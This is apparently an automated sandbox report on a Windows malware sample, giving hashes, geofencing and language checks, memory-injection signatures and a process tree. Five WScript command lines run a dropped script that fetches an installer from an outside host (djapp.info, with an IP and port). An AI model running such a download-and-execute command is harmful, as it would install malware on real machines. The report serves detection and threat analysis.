Analysis
max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06/09/2024, 15:37
Static task: static1
Behavioral task: behavioral1
Sample: 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe
Resource: win7-20240708-en
General
Target: 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe
Size: 184KB
MD5: ce50ed54a539f85a378626c786c8a5fd
SHA1: b0ac55b2a82533238a96233db46692490f763b65
SHA256: 163c5db8ff5d6da725486749841705e441d967fcda70f3a03301f26052b0863a
SHA512: 727fd07e6256c2d96760bb0b4f724794b3a530a163dcb2ea8cf5908f550a46b0860c33a2b8ccf0009daa7611059ff49eea3453625fe5b2954125a5d2fa075f8f
SSDEEP: 3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3p:/7BSH8zUB+nGESaaRvoB7FJNndnY
Malware Config
Signatures
- Blocklisted process makes network request (6 IoCs)
  flow  pid   Process
  8     2312  WScript.exe
  16    3216  WScript.exe
  26    3044  WScript.exe
  44    4772  WScript.exe
  45    4772  WScript.exe
  53    1156  WScript.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation
  Process: 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe
- Command and Scripting Interpreter: JavaScript (1 TTP)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 6 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
- Modifies registry class (1 IoC)
  description: Key created
  ioc: \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings
  Process: 20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  description                       pid   Process                                            procid_target
  PID 4460 wrote to memory of 2312  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  86
  PID 4460 wrote to memory of 2312  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  86
  PID 4460 wrote to memory of 2312  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  86
  PID 4460 wrote to memory of 3216  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  87
  PID 4460 wrote to memory of 3216  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  87
  PID 4460 wrote to memory of 3216  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  87
  PID 4460 wrote to memory of 3044  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  92
  PID 4460 wrote to memory of 3044  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  92
  PID 4460 wrote to memory of 3044  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  92
  PID 4460 wrote to memory of 4772  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  98
  PID 4460 wrote to memory of 4772  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  98
  PID 4460 wrote to memory of 4772  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  98
  PID 4460 wrote to memory of 1156  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  99
  PID 4460 wrote to memory of 1156  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  99
  PID 4460 wrote to memory of 1156  4460  20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe  99
Processes
C:\Users\Admin\AppData\Local\Temp\20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\20240906ce50ed54a539f85a378626c786c8a5fdmafia.exe"
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID: 4460
  C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf96F0.js" http://www.djapp.info/?domain=fGCKQnUEDz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf96F0.exe
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    PID: 2312
  C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf96F0.js" http://www.djapp.info/?domain=fGCKQnUEDz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf96F0.exe
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    PID: 3216
  C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf96F0.js" http://www.djapp.info/?domain=fGCKQnUEDz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf96F0.exe
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    PID: 3044
  C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf96F0.js" http://www.djapp.info/?domain=fGCKQnUEDz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf96F0.exe
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    PID: 4772
  C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf96F0.js" http://www.djapp.info/?domain=fGCKQnUEDz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf96F0.exe
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    PID: 1156
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: 3813cab188d1de6f92f8b82c2059991b
  SHA1: 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
  SHA256: a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
  SHA512: 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76